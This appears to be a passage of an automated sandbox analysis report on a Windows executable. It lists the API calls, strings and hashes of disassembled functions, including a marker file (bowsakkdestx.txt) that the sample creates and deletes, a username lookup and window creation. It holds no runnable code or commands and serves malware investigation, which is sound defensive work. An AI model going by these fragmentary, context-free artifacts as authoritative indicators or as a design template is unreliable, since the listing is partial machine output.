            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memmove
            • String ID: invalid string position$string too long
            • API String ID: 4104443479-4289949731
            • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
            • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
            • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
            • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memmove
            • String ID: invalid string position$string too long
            • API String ID: 4104443479-4289949731
            • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
            • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
            • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
            • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _wcsnlen
            • String ID: U
            • API String ID: 3628947076-3372436214
            • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
            • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
            • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
            • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: .\crypto\buffer\buffer.c$C7F
            • API String ID: 2102423945-2013712220
            • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
            • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
            • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
            • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
            APIs
            Strings
            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: StringUuid$CreateFree
            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
            • API String ID: 3044360575-2335240114
            • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
            • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
            • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
            • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
            APIs
            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Path$AppendFolder
            • String ID: bowsakkdestx.txt
            • API String ID: 29327785-2616962270
            • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
            • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
            • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
            • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
            APIs
            • _malloc.LIBCMT ref: 00423B64
              • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
              • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
              • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00760000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
            • std::exception::exception.LIBCMT ref: 00423B82
            • __CxxThrowException@8.LIBCMT ref: 00423B97
              • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
            • String ID: bad allocation
            • API String ID: 3074076210-2104205924
            • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
            • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
            • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
            • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
            APIs
            • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
            • RegisterClassExW.USER32(00000030), ref: 0041BA73
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ClassCursorLoadRegister
            • String ID: 0$LPCWSTRszWindowClass
            • API String ID: 1693014935-1496217519
            • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
            • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
            • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
            • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
            APIs
            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
            • DeleteFileA.KERNEL32(?), ref: 0040C45B
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Path$AppendDeleteFileFolder
            • String ID: bowsakkdestx.txt
            • API String ID: 610490371-2616962270
            • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
            • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
            • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
            • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: p2Q
            • API String ID: 2102423945-1521255505
            • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
            • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
            • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memmove_strtok
            • String ID:
            • API String ID: 3446180046-0
            • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
            • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
            • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
            • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
            • String ID:
            • API String ID: 2974526305-0
            • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
            • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
            • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
            • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
            APIs
            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
            • __isleadbyte_l.LIBCMT ref: 0043C6DB
            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
            • String ID:
            • API String ID: 3058430110-0
            • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
            • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
            • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
            • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
            APIs
            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
            • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
            • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseCreateHandleWritelstrlen
            • String ID:
            • API String ID: 1421093161-0
            • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
            • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
            • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
            • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
            APIs
            • ___BuildCatchObject.LIBCMT ref: 004C70AB
              • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
              • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
            • _UnwindNestedFrames.LIBCMT ref: 004C70C2
            • ___FrameUnwindToState.LIBCMT ref: 004C70D4
            • CallCatchBlock.LIBCMT ref: 004C70F8
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
            • String ID:
            • API String ID: 2901542994-0
            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
            • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
            APIs
              • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
              • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
            • __calloc_crt.LIBCMT ref: 00425A01
              • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
            • __lock.LIBCMT ref: 00425A37
            • ___addlocaleref.LIBCMT ref: 00425A43
            • __lock.LIBCMT ref: 00425A57
              • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
            • String ID:
            • API String ID: 2580527540-0
            • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
            • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
            • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
            • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
            • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
            APIs
            • lstrlenW.KERNEL32 ref: 004127B9
            • _malloc.LIBCMT ref: 004127C3
              • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
              • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
              • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00760000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
            • _memset.LIBCMT ref: 004127CE
            • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
            • String ID:
            • API String ID: 2824100046-0
            • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
            • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
            • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
            • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
            APIs
            • lstrlenA.KERNEL32 ref: 00412806
            • _malloc.LIBCMT ref: 00412814
              • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
              • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
              • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00760000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
            • _memset.LIBCMT ref: 0041281F
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
            • String ID:
            • API String ID: 2824100046-0
            • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
            • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
            • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
            • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memmove
            • String ID: invalid string position$string too long
            • API String ID: 4104443479-4289949731
            • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
            • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
            • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
            • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: .\crypto\asn1\tasn_new.c
            • API String ID: 2102423945-2878120539
            • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
            • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
            • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
            • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memmove
            • String ID: invalid string position$string too long
            • API String ID: 4104443479-4289949731
            • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
            • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
            • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
            • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
            APIs
            • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
              • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
              • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
              • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
              • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
              • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
              • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
              • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
            • TranslateMessage.USER32(?), ref: 0041B4CD
            • DispatchMessageW.USER32(?), ref: 0041B4D7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
            • String ID: %username%$I:\5d2860c89d774.jpg
            • API String ID: 441990211-897913220
            • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
            • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
            • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
            • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .\crypto\err\err.c$unknown
            • API String ID: 0-565200744
            • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
